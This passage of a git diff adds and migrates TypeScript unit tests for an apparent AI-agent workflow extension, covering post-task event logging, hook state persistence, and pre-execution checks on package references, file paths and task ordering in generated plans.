+import { openDatabase, closeDatabase } from '../gsd-db.ts';
+import { handleCompleteTask } from '../tools/complete-task.ts';
+import { readEvents } from '../workflow-events.ts';
+import { readManifest } from '../workflow-manifest.ts';
+
+function tempDir(): string {
+  return fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-post-hook-'));
+}
+
+function cleanupDir(dirPath: string): void {
+  try { fs.rmSync(dirPath, { recursive: true, force: true }); } catch { /* best effort */ }
+}
+
+/** Create a minimal project directory with a PLAN.md for complete-task to find. */
+function createProject(basePath: string): void {
+  const sliceDir = path.join(basePath, '.gsd', 'milestones', 'M001', 'slices', 'S01');
+  const tasksDir = path.join(sliceDir, 'tasks');
+  fs.mkdirSync(tasksDir, { recursive: true });
+  fs.writeFileSync(path.join(sliceDir, 'S01-PLAN.md'), `# S01: Test Slice
+
+## Tasks
+
+- [ ] **T01: Test task** \`est:30m\`
+  - Do: Implement the thing
+  - Verify: Run tests
+
+- [ ] **T02: Second task** \`est:1h\`
+  - Do: Implement more
+  - Verify: Run more tests
+`);
+}
+
+function makeCompleteTaskParams() {
+  return {
+    taskId: 'T01',
+    sliceId: 'S01',
+    milestoneId: 'M001',
+    oneLiner: 'Implemented auth middleware',
+    narrative: 'Added JWT validation middleware with proper error handling.',
+    verification: 'Ran npm test — all tests pass.',
+    deviations: 'None.',
+    knownIssues: 'None.',
+    keyFiles: ['src/middleware/auth.ts'],
+    keyDecisions: [],
+    blockerDiscovered: false,
+    verificationEvidence: [
+      { command: 'npm test', exitCode: 0, verdict: '✅ pass', durationMs: 2500 },
+    ],
+  };
+}
+
+// ─── Post-mutation hook: event log ───────────────────────────────────────
+
+test('post-mutation-hook: event-log.jsonl exists after handleCompleteTask', async () => {
+  const base = tempDir();
+  const dbPath = path.join(base, 'test.db');
+  openDatabase(dbPath);
+  createProject(base);
+
+  try {
+    const result = await handleCompleteTask(makeCompleteTaskParams(), base);
+    assert.ok(!('error' in result), `handler should succeed, got: ${JSON.stringify(result)}`);
+
+    const logPath = path.join(base, '.gsd', 'event-log.jsonl');
+    assert.ok(fs.existsSync(logPath), 'event-log.jsonl should exist after handler completes');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+test('post-mutation-hook: event log contains complete-task event with correct params', async () => {
+  const base = tempDir();
+  const dbPath = path.join(base, 'test.db');
+  openDatabase(dbPath);
+  createProject(base);
+
+  try {
+    await handleCompleteTask(makeCompleteTaskParams(), base);
+
+    const logPath = path.join(base, '.gsd', 'event-log.jsonl');
+    const events = readEvents(logPath);
+    assert.ok(events.length > 0, 'event log should have at least one event');
+
+    const ev = events.find((e) => e.cmd === 'complete-task');
+    assert.ok(ev !== undefined, 'should have a complete-task event');
+    assert.strictEqual((ev!.params as { milestoneId?: string }).milestoneId, 'M001');
+    assert.strictEqual((ev!.params as { sliceId?: string }).sliceId, 'S01');
+    assert.strictEqual((ev!.params as { taskId?: string }).taskId, 'T01');
+    assert.strictEqual(ev!.actor, 'agent');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+// ─── Post-mutation hook: manifest ────────────────────────────────────────
+
+test('post-mutation-hook: state-manifest.json exists after handleCompleteTask', async () => {
+  const base = tempDir();
+  const dbPath = path.join(base, 'test.db');
+  openDatabase(dbPath);
+  createProject(base);
+
+  try {
+    const result = await handleCompleteTask(makeCompleteTaskParams(), base);
+    assert.ok(!('error' in result), `handler should succeed, got: ${JSON.stringify(result)}`);
+
+    const manifestPath = path.join(base, '.gsd', 'state-manifest.json');
+    assert.ok(fs.existsSync(manifestPath), 'state-manifest.json should exist after handler completes');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+test('post-mutation-hook: manifest has version 1 and includes completed task', async () => {
+  const base = tempDir();
+  const dbPath = path.join(base, 'test.db');
+  openDatabase(dbPath);
+  createProject(base);
+
+  try {
+    await handleCompleteTask(makeCompleteTaskParams(), base);
+
+    const manifest = readManifest(base);
+    assert.ok(manifest !== null, 'manifest should be readable');
+    assert.strictEqual(manifest!.version, 1);
+
+    const task = manifest!.tasks.find((t) => t.id === 'T01');
+    assert.ok(task !== undefined, 'T01 should appear in manifest');
+    assert.strictEqual(task!.status, 'complete');
+    assert.strictEqual(task!.milestone_id, 'M001');
+    assert.strictEqual(task!.slice_id, 'S01');
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
+
+// ─── Post-mutation hook: non-fatal on hook failure ───────────────────────
+
+test('post-mutation-hook: handler still returns success even if projections dir is missing', async () => {
+  // basePath with NO .gsd directory — projections will fail to find milestones
+  // but handler should still return a result (not throw)
+  const base = tempDir();
+  const dbPath = path.join(base, 'test.db');
+  openDatabase(dbPath);
+
+  // Create tasks dir but NO plan file (projections will soft-fail)
+  const tasksDir = path.join(base, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks');
+  fs.mkdirSync(tasksDir, { recursive: true });
+
+  try {
+    const result = await handleCompleteTask(makeCompleteTaskParams(), base);
+    // Handler should succeed (post-hook failures are non-fatal)
+    assert.ok(!('error' in result), `handler should not propagate hook errors, got: ${JSON.stringify(result)}`);
+  } finally {
+    closeDatabase();
+    cleanupDir(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/post-unit-hooks.test.ts b/src/resources/extensions/gsd/tests/post-unit-hooks.test.ts
index 771af2968..7294a8d1f 100644
--- a/src/resources/extensions/gsd/tests/post-unit-hooks.test.ts
+++ b/src/resources/extensions/gsd/tests/post-unit-hooks.test.ts
@@ -1,9 +1,10 @@
 // GSD Extension — Hook Engine Tests (Post-Unit, Pre-Dispatch, State Persistence)
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync, readFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
-import { createTestContext } from "./test-helpers.ts";
 import {
   checkPostUnitHooks,
   getActiveHook,
@@ -20,8 +21,6 @@ import {
   triggerHookManually,
 } from "../post-unit-hooks.ts";
 
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
-
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -36,14 +35,14 @@ function createFixtureBase(): string {
 
 // ─── resolveHookArtifactPath ───────────────────────────────────────────────
 
-console.log("\n=== resolveHookArtifactPath ===");
 
-{
+describe('post-unit-hooks', () => {
+test('resolveHookArtifactPath', () => {
   const base = "/project";
 
   // Task-level
   const taskPath = resolveHookArtifactPath(base, "M001/S01/T01", "REVIEW-PASS.md");
-  assertEq(
+  assert.deepStrictEqual(
     taskPath,
     join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-REVIEW-PASS.md"),
     "task-level artifact path",
@@ -51,7 +50,7 @@ console.log("\n=== resolveHookArtifactPath ===");
 
   // Slice-level
   const slicePath = resolveHookArtifactPath(base, "M001/S01", "REVIEW-PASS.md");
-  assertEq(
+  assert.deepStrictEqual(
     slicePath,
     join(base, ".gsd", "milestones", "M001", "slices", "S01", "REVIEW-PASS.md"),
     "slice-level artifact path",
@@ -59,129 +58,106 @@ console.log("\n=== resolveHookArtifactPath ===");
 
   // Milestone-level
   const milestonePath = resolveHookArtifactPath(base, "M001", "REVIEW-PASS.md");
-  assertEq(
+  assert.deepStrictEqual(
     milestonePath,
     join(base, ".gsd", "milestones", "M001", "REVIEW-PASS.md"),
     "milestone-level artifact path",
   );
-}
+});
 
 // ─── resetHookState ────────────────────────────────────────────────────────
-
-console.log("\n=== resetHookState ===");
-
-{
+test('resetHookState', () => {
   resetHookState();
-  assertEq(getActiveHook(), null, "no active hook after reset");
-  assertTrue(!isRetryPending(), "no retry pending after reset");
-  assertEq(consumeRetryTrigger(), null, "no retry trigger after reset");
-}
+  assert.deepStrictEqual(getActiveHook(), null, "no active hook after reset");
+  assert.ok(!isRetryPending(), "no retry pending after reset");
+  assert.deepStrictEqual(consumeRetryTrigger(), null, "no retry trigger after reset");
+});
 
 // ─── checkPostUnitHooks with no hooks configured ───────────────────────────
-
-console.log("\n=== No hooks configured ===");
-
-{
+test('No hooks configured', () => {
   resetHookState();
   const base = createFixtureBase();
   try {
     const result = checkPostUnitHooks("execute-task", "M001/S01/T01", base);
-    assertEq(result, null, "returns null when no hooks configured");
+    assert.deepStrictEqual(result, null, "returns null when no hooks configured");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ─── Hook units don't trigger hooks (no hook-on-hook) ──────────────────────
-
-console.log("\n=== Hook-on-hook prevention ===");
-
-{
+test('Hook-on-hook prevention', () => {
   resetHookState();
   const base = createFixtureBase();
   try {
     const result = checkPostUnitHooks("hook/code-review", "M001/S01/T01", base);
-    assertEq(result, null, "hook units don't trigger other hooks");
+    assert.deepStrictEqual(result, null, "hook units don't trigger other hooks");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ─── consumeRetryTrigger clears state ──────────────────────────────────────
-
-console.log("\n=== consumeRetryTrigger clears state ===");
-
-{
+test('consumeRetryTrigger clears state', () => {
   resetHookState();
-  assertEq(consumeRetryTrigger(), null, "no trigger initially");
-  assertTrue(!isRetryPending(), "no retry initially");
-}
+  assert.deepStrictEqual(consumeRetryTrigger(), null, "no trigger initially");
+  assert.ok(!isRetryPending(), "no retry initially");
+});
 
 // ─── Variable substitution in prompts ──────────────────────────────────────
-
-console.log("\n=== Variable substitution ===");
-
-{
+test('Variable substitution', () => {
   const base = "/project";
 
   // 3-part ID
   const path3 = resolveHookArtifactPath(base, "M002/S03/T05", "result.md");
-  assertTrue(path3.includes("M002"), "3-part ID extracts milestoneId");
-  assertTrue(path3.includes("S03"), "3-part ID extracts sliceId");
-  assertTrue(path3.includes("T05"), "3-part ID extracts taskId");
-  assertTrue(path3.includes("milestones"), "3-part ID includes milestones/ segment");
+  assert.ok(path3.includes("M002"), "3-part ID extracts milestoneId");
+  assert.ok(path3.includes("S03"), "3-part ID extracts sliceId");
+  assert.ok(path3.includes("T05"), "3-part ID extracts taskId");
+  assert.ok(path3.includes("milestones"), "3-part ID includes milestones/ segment");
 
   // 2-part ID
   const path2 = resolveHookArtifactPath(base, "M002/S03", "result.md");
-  assertTrue(path2.includes("M002"), "2-part ID extracts milestoneId");
-  assertTrue(path2.includes("S03"), "2-part ID extracts sliceId");
-  assertTrue(path2.includes("milestones"), "2-part ID includes milestones/ segment");
+  assert.ok(path2.includes("M002"), "2-part ID extracts milestoneId");
+  assert.ok(path2.includes("S03"), "2-part ID extracts sliceId");
+  assert.ok(path2.includes("milestones"), "2-part ID includes milestones/ segment");
 
   // 1-part ID
   const path1 = resolveHookArtifactPath(base, "M002", "result.md");
-  assertTrue(path1.includes("M002"), "1-part ID extracts milestoneId");
-  assertTrue(path1.includes("milestones"), "1-part ID includes milestones/ segment");
-}
+  assert.ok(path1.includes("M002"), "1-part ID extracts milestoneId");
+  assert.ok(path1.includes("milestones"), "1-part ID includes milestones/ segment");
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Phase 2: Pre-Dispatch Hook Tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Pre-dispatch: no hooks configured ===");
-
-{
+test('Pre-dispatch: no hooks configured', () => {
   const base = createFixtureBase();
   try {
     const result = runPreDispatchHooks("execute-task", "M001/S01/T01", "original prompt", base);
-    assertEq(result.action, "proceed", "proceeds when no hooks");
-    assertEq(result.prompt, "original prompt", "prompt unchanged");
-    assertEq(result.firedHooks.length, 0, "no hooks fired");
+    assert.deepStrictEqual(result.action, "proceed", "proceeds when no hooks");
+    assert.deepStrictEqual(result.prompt, "original prompt", "prompt unchanged");
+    assert.deepStrictEqual(result.firedHooks.length, 0, "no hooks fired");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
-console.log("\n=== Pre-dispatch: hook units bypass ===");
-
-{
+test('Pre-dispatch: hook units bypass', () => {
   const base = createFixtureBase();
   try {
     const result = runPreDispatchHooks("hook/review", "M001/S01/T01", "hook prompt", base);
-    assertEq(result.action, "proceed", "hook units always proceed");
-    assertEq(result.prompt, "hook prompt", "hook prompt unchanged");
-    assertEq(result.firedHooks.length, 0, "no hooks fired for hook units");
+    assert.deepStrictEqual(result.action, "proceed", "hook units always proceed");
+    assert.deepStrictEqual(result.prompt, "hook prompt", "hook prompt unchanged");
+    assert.deepStrictEqual(result.firedHooks.length, 0, "no hooks fired for hook units");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Phase 3: State Persistence Tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== State persistence: persist and restore ===");
-
-{
+test('State persistence: persist and restore', () => {
   const base = createFixtureBase();
   try {
     resetHookState();
@@ -189,19 +165,17 @@ console.log("\n=== State persistence: persist and restore ===");
     // Persist empty state
     persistHookState(base);
     const filePath = join(base, ".gsd", "hook-state.json");
-    assertTrue(existsSync(filePath), "hook-state.json created");
+    assert.ok(existsSync(filePath), "hook-state.json created");
 
     const content = JSON.parse(readFileSync(filePath, "utf-8"));
-    assertEq(typeof content.savedAt, "string", "savedAt is a string");
-    assertEq(Object.keys(content.cycleCounts).length, 0, "empty cycle counts");
+    assert.deepStrictEqual(typeof content.savedAt, "string", "savedAt is a string");
+    assert.deepStrictEqual(Object.keys(content.cycleCounts).length, 0, "empty cycle counts");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
-console.log("\n=== State persistence: restore from disk ===");
-
-{
+test('State persistence: restore from disk', () => {
   const base = createFixtureBase();
   try {
     resetHookState();
@@ -222,16 +196,14 @@ console.log("\n=== State persistence: restore from disk ===");
     // Verify by persisting and reading back
     persistHookState(base);
     const restored = JSON.parse(readFileSync(stateFile, "utf-8"));
-    assertEq(restored.cycleCounts["review/execute-task/M001/S01/T01"], 2, "cycle count restored for review");
-    assertEq(restored.cycleCounts["simplify/execute-task/M001/S01/T02"], 1, "cycle count restored for simplify");
+    assert.deepStrictEqual(restored.cycleCounts["review/execute-task/M001/S01/T01"], 2, "cycle count restored for review");
+    assert.deepStrictEqual(restored.cycleCounts["simplify/execute-task/M001/S01/T02"], 1, "cycle count restored for simplify");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
-console.log("\n=== State persistence: clear ===");
-
-{
+test('State persistence: clear', () => {
   const base = createFixtureBase();
   try {
     resetHookState();
@@ -246,77 +218,65 @@ console.log("\n=== State persistence: clear ===");
     clearPersistedHookState(base);
 
     const cleared = JSON.parse(readFileSync(stateFile, "utf-8"));
-    assertEq(Object.keys(cleared.cycleCounts).length, 0, "cycle counts cleared");
+    assert.deepStrictEqual(Object.keys(cleared.cycleCounts).length, 0, "cycle counts cleared");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
-console.log("\n=== State persistence: restore handles missing file ===");
-
-{
+test('State persistence: restore handles missing file', () => {
   const base = createFixtureBase();
   try {
     resetHookState();
     // Should not throw
     restoreHookState(base);
-    assertEq(getActiveHook(), null, "no active hook after restore from missing file");
+    assert.deepStrictEqual(getActiveHook(), null, "no active hook after restore from missing file");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
-console.log("\n=== State persistence: restore handles corrupt file ===");
-
-{
+test('State persistence: restore handles corrupt file', () => {
   const base = createFixtureBase();
   try {
     resetHookState();
     writeFileSync(join(base, ".gsd", "hook-state.json"), "not json", "utf-8");
     // Should not throw
     restoreHookState(base);
-    assertEq(getActiveHook(), null, "no active hook after corrupt restore");
+    assert.deepStrictEqual(getActiveHook(), null, "no active hook after corrupt restore");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Phase 3: Hook Status Reporting Tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== Hook status: no hooks ===");
-
-{
+test('Hook status: no hooks', () => {
   resetHookState();
   const entries = getHookStatus();
   // No preferences file = no hooks
-  assertEq(entries.length, 0, "no entries when no hooks configured");
+  assert.deepStrictEqual(entries.length, 0, "no entries when no hooks configured");
 
   const formatted = formatHookStatus();
-  assertMatch(formatted, /No hooks configured/, "status message says no hooks");
-}
+  assert.match(formatted, /No hooks configured/, "status message says no hooks");
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Phase 4: Manual Hook Trigger Tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log("\n=== triggerHookManually: hook not found ===");
-
-{
+test('triggerHookManually: hook not found', () => {
   resetHookState();
   const base = createFixtureBase();
   try {
     const result = triggerHookManually("nonexistent-hook", "execute-task", "M001/S01/T01", base);
-    assertEq(result, null, "returns null when hook not found");
+    assert.deepStrictEqual(result, null, "returns null when hook not found");
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
-console.log("\n=== triggerHookManually: with configured hook ===");
-
-{
+test('triggerHookManually: with configured hook', () => {
   resetHookState();
   const base = createFixtureBase();
   try {
@@ -325,16 +285,16 @@ console.log("\n=== triggerHookManually: with configured hook ===");
     const result = triggerHookManually("code-review", "execute-task", "M001/S01/T01", base);
     // Result depends on whether code-review hook is configured in preferences
     // The function should either return null or a valid HookDispatchResult
-    assertTrue(result === null || typeof result === "object", "returns null or object");
+    assert.ok(result === null || typeof result === "object", "returns null or object");
     if (result) {
-      assertEq(result.hookName, "code-review", "hook name in result");
-      assertEq(result.unitType, "hook/code-review", "unit type is hook-prefixed");
-      assertEq(result.unitId, "M001/S01/T01", "unit ID preserved");
-      assertTrue(typeof result.prompt === "string", "prompt is a string");
+      assert.deepStrictEqual(result.hookName, "code-review", "hook name in result");
+      assert.deepStrictEqual(result.unitType, "hook/code-review", "unit type is hook-prefixed");
+      assert.deepStrictEqual(result.unitId, "M001/S01/T01", "unit ID preserved");
+      assert.ok(typeof result.prompt === "string", "prompt is a string");
     }
   } finally {
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/pre-exec-backtick-strip.test.ts b/src/resources/extensions/gsd/tests/pre-exec-backtick-strip.test.ts
new file mode 100644
index 000000000..ffdeae7c8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/pre-exec-backtick-strip.test.ts
@@ -0,0 +1,68 @@
+/**
+ * Regression test for #3626 / #3649 — pre-execution-checks false positives
+ *
+ * Two sources of false positives were fixed:
+ *   1. normalizeFilePath did not strip backtick wrapping from LLM-generated
+ *      paths like `src/foo.ts`, causing file-existence checks to fail (#3649).
+ *   2. checkFilePathConsistency checked both task.files and task.inputs, but
+ *      task.files ("files likely touched") intentionally includes files that
+ *      will be created by the task, so they don't need to pre-exist (#3626).
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { normalizeFilePath, checkFilePathConsistency } from '../pre-execution-checks.ts'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+const src = readFileSync(
+  resolve(process.cwd(), 'src', 'resources', 'extensions', 'gsd', 'pre-execution-checks.ts'),
+  'utf-8',
+)
+
+describe('normalizeFilePath backtick stripping (#3649)', () => {
+  it('strips backticks from file paths', () => {
+    assert.equal(normalizeFilePath('`src/foo.ts`'), 'src/foo.ts')
+  })
+
+  it('strips backticks even when mixed with other normalization', () => {
+    assert.equal(normalizeFilePath('`./src//bar.ts`'), 'src/bar.ts')
+  })
+
+  it('leaves normal paths unchanged', () => {
+    assert.equal(normalizeFilePath('src/foo.ts'), 'src/foo.ts')
+  })
+
+  it('handles empty string', () => {
+    assert.equal(normalizeFilePath(''), '')
+  })
+})
+
+describe('checkFilePathConsistency checks task.inputs not task.files (#3626)', () => {
+  it('source uses only task.inputs in filesToCheck', () => {
+    // Verify the fix structurally: the spread should be [...task.inputs] only
+    const fnStart = src.indexOf('export function checkFilePathConsistency(')
+    assert.ok(fnStart !== -1, 'checkFilePathConsistency function must exist')
+
+    // Find the filesToCheck assignment
+    const filesToCheckLine = src.indexOf('filesToCheck', fnStart)
+    assert.ok(filesToCheckLine !== -1, 'filesToCheck assignment must exist')
+
+    // Extract the line
+    const lineEnd = src.indexOf('\n', filesToCheckLine)
+    const line = src.slice(filesToCheckLine, lineEnd)
+
+    // Must include task.inputs
+    assert.ok(
+      line.includes('task.inputs'),
+      'filesToCheck must reference task.inputs',
+    )
+
+    // Must NOT include task.files
+    assert.ok(
+      !line.includes('task.files'),
+      'filesToCheck must NOT reference task.files — files likely touched include ' +
+        'files the task will create, so they do not need to pre-exist',
+    )
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/pre-execution-checks.test.ts b/src/resources/extensions/gsd/tests/pre-execution-checks.test.ts
new file mode 100644
index 000000000..79ac6a692
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/pre-execution-checks.test.ts
@@ -0,0 +1,1263 @@
+/**
+ * pre-execution-checks.test.ts — Unit tests for pre-execution validation checks.
+ *
+ * Tests all 4 check types:
+ *   1. Package existence — npm view mocking, timeout handling
+ *   2. File path consistency — files exist vs prior expected_output
+ *   3. Task ordering — detect impossible read-before-create
+ *   4. Interface contracts — contradictory function signatures
+ */
+
+import { describe, test, mock } from "node:test";
+import assert from "node:assert/strict";
+import { tmpdir } from "node:os";
+import { mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+
+import {
+  extractPackageReferences,
+  checkFilePathConsistency,
+  checkTaskOrdering,
+  checkInterfaceContracts,
+  runPreExecutionChecks,
+  normalizeFilePath,
+  type PreExecutionResult,
+} from "../pre-execution-checks.ts";
+import type { TaskRow } from "../gsd-db.ts";
+
+// ─── Test Fixtures ───────────────────────────────────────────────────────────
+
+/**
+ * Create a minimal TaskRow for testing.
+ */
+function createTask(overrides: Partial<TaskRow> = {}): TaskRow {
+  return {
+    milestone_id: "M001",
+    slice_id: "S01",
+    id: overrides.id ?? "T01",
+    title: "Test Task",
+    status: "pending",
+    one_liner: "",
+    narrative: "",
+    verification_result: "",
+    duration: "",
+    completed_at: null,
+    blocker_discovered: false,
+    deviations: "",
+    known_issues: "",
+    key_files: [],
+    key_decisions: [],
+    full_summary_md: "",
+    description: overrides.description ?? "",
+    estimate: "",
+    files: overrides.files ?? [],
+    verify: "",
+    inputs: overrides.inputs ?? [],
+    expected_output: overrides.expected_output ?? [],
+    observability_impact: "",
+    full_plan_md: "",
+    sequence: overrides.sequence ?? 0,
+    ...overrides,
+  };
+}
+
+// ─── Package Reference Extraction Tests ──────────────────────────────────────
+
+describe("extractPackageReferences", () => {
+  test("extracts npm install patterns", () => {
+    const desc = "Run npm install lodash then npm i axios";
+    const packages = extractPackageReferences(desc);
+    assert.deepEqual(packages.sort(), ["axios", "lodash"]);
+  });
+
+  test("extracts yarn add patterns", () => {
+    const desc = "yarn add react-dom";
+    const packages = extractPackageReferences(desc);
+    assert.deepEqual(packages, ["react-dom"]);
+  });
+
+  test("extracts scoped packages", () => {
+    const desc = "npm install @types/node @babel/core";
+    const packages = extractPackageReferences(desc);
+    assert.ok(packages.includes("@types/node"));
+    assert.ok(packages.includes("@babel/core"));
+  });
+
+  test("extracts require statements from code blocks", () => {
+    const desc = `
+\`\`\`javascript
+const fs = require('fs-extra');
+const path = require('path');
+\`\`\`
+    `;
+    const packages = extractPackageReferences(desc);
+    assert.ok(packages.includes("fs-extra"));
+  });
+
+  test("extracts import statements from code blocks", () => {
+    const desc = `
+\`\`\`typescript
+import express from 'express';
+import { Router } from 'express';
+import type { Request } from 'express';
+\`\`\`
+    `;
+    const packages = extractPackageReferences(desc);
+    assert.ok(packages.includes("express"));
+  });
+
+  test("ignores relative imports", () => {
+    const desc = `import { foo } from './local-file';`;
+    const packages = extractPackageReferences(desc);
+    assert.deepEqual(packages, []);
+  });
+
+  test("ignores node builtins", () => {
+    const desc = `import fs from 'node:fs';`;
+    const packages = extractPackageReferences(desc);
+    assert.deepEqual(packages, []);
+  });
+
+  test("normalizes package subpaths", () => {
+    const desc = "npm install lodash/get";
+    const packages = extractPackageReferences(desc);
+    assert.deepEqual(packages, ["lodash"]);
+  });
+
+  test("handles empty description", () => {
+    const packages = extractPackageReferences("");
+    assert.deepEqual(packages, []);
+  });
+
+  test("ignores flags in npm install", () => {
+    const desc = "npm install -D typescript";
+    const packages = extractPackageReferences(desc);
+    assert.ok(packages.includes("typescript"));
+    assert.ok(!packages.includes("-D"));
+  });
+});
+
+// ─── File Path Consistency Tests ─────────────────────────────────────────────
+
+describe("checkFilePathConsistency", () => {
+  let tempDir: string;
+
+  test("passes when files exist on disk", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+    writeFileSync(join(tempDir, "existing.ts"), "// content");
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: ["existing.ts"],
+          inputs: [],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("passes when files are in prior expected_output", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          files: [],
+          inputs: [],
+          expected_output: ["generated.ts"],
+        }),
+        createTask({
+          id: "T02",
+          sequence: 1,
+          files: ["generated.ts"],
+          inputs: [],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("fails when inputs don't exist and not in prior outputs", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: [],
+          inputs: ["nonexistent.ts"],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.equal(results.length, 1);
+      assert.equal(results[0].category, "file");
+      assert.equal(results[0].passed, false);
+      assert.equal(results[0].blocking, true);
+      assert.ok(results[0].message.includes("nonexistent.ts"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("checks only inputs array, not files array", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: ["missing-file.ts"],
+          inputs: ["missing-input.ts"],
+          expected_output: [],
+        }),
+      ];
+
+      // Only inputs are checked — files ("files likely touched") are excluded
+      // because they may include files the task will create (#3626)
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.equal(results.length, 1);
+      assert.ok(results.some((r) => r.target === "missing-input.ts"));
+      // missing-file.ts should NOT produce a failure
+      assert.ok(!results.some((r) => r.target === "missing-file.ts"));
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("skips empty file strings", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          files: ["", "  "],
+          inputs: [],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.deepEqual(results, []);
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+});
+
+// ─── Path Normalization Tests ────────────────────────────────────────────────
+
+describe("normalizeFilePath", () => {
+  test("strips leading ./", () => {
+    assert.equal(normalizeFilePath("./src/a.ts"), "src/a.ts");
+    assert.equal(normalizeFilePath("././foo.ts"), "foo.ts");
+  });
+
+  test("normalizes backslashes to forward slashes", () => {
+    assert.equal(normalizeFilePath("src\\a.ts"), "src/a.ts");
+    assert.equal(normalizeFilePath("src\\sub\\file.ts"), "src/sub/file.ts");
+  });
+
+  test("removes duplicate slashes", () => {
+    assert.equal(normalizeFilePath("src//a.ts"), "src/a.ts");
+    assert.equal(normalizeFilePath("src///sub//file.ts"), "src/sub/file.ts");
+  });
+
+  test("handles empty string", () => {
+    assert.equal(normalizeFilePath(""), "");
+  });
+
+  test("removes trailing slash", () => {
+    assert.equal(normalizeFilePath("src/"), "src");
+    assert.equal(normalizeFilePath("src/sub/"), "src/sub");
+  });
+
+  test("handles paths without any normalization needed", () => {
+    assert.equal(normalizeFilePath("src/a.ts"), "src/a.ts");
+    assert.equal(normalizeFilePath("index.ts"), "index.ts");
+  });
+});
+
+describe("checkFilePathConsistency with path normalization", () => {
+  let tempDir: string;
+
+  test("./path matches path in prior expected_output", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          files: [],
+          inputs: [],
+          expected_output: ["src/generated.ts"], // Output without ./
+        }),
+        createTask({
+          id: "T02",
+          sequence: 1,
+          files: ["./src/generated.ts"], // Input with ./
+          inputs: [],
+          expected_output: [],
+        }),
+      ];
+
+      const results = checkFilePathConsistency(tasks, tempDir);
+      assert.deepEqual(results, [], "Should pass because ./src/generated.ts matches src/generated.ts");
+    } finally {
+      rmSync(tempDir, { recursive: true, force: true });
+    }
+  });
+
+  test("path matches ./path in prior expected_output", () => {
+    tempDir = join(tmpdir(), `pre-exec-test-${Date.now()}`);
+    mkdirSync(tempDir, { recursive: true });
+
+    try {
+      const tasks = [
+        createTask({
+          id: "T01",
+          sequence: 0,
+          files: [],
+          inputs: [],
+          expected_output: ["./src/generated.ts"], // Output with ./
+        }),
+        createTask({
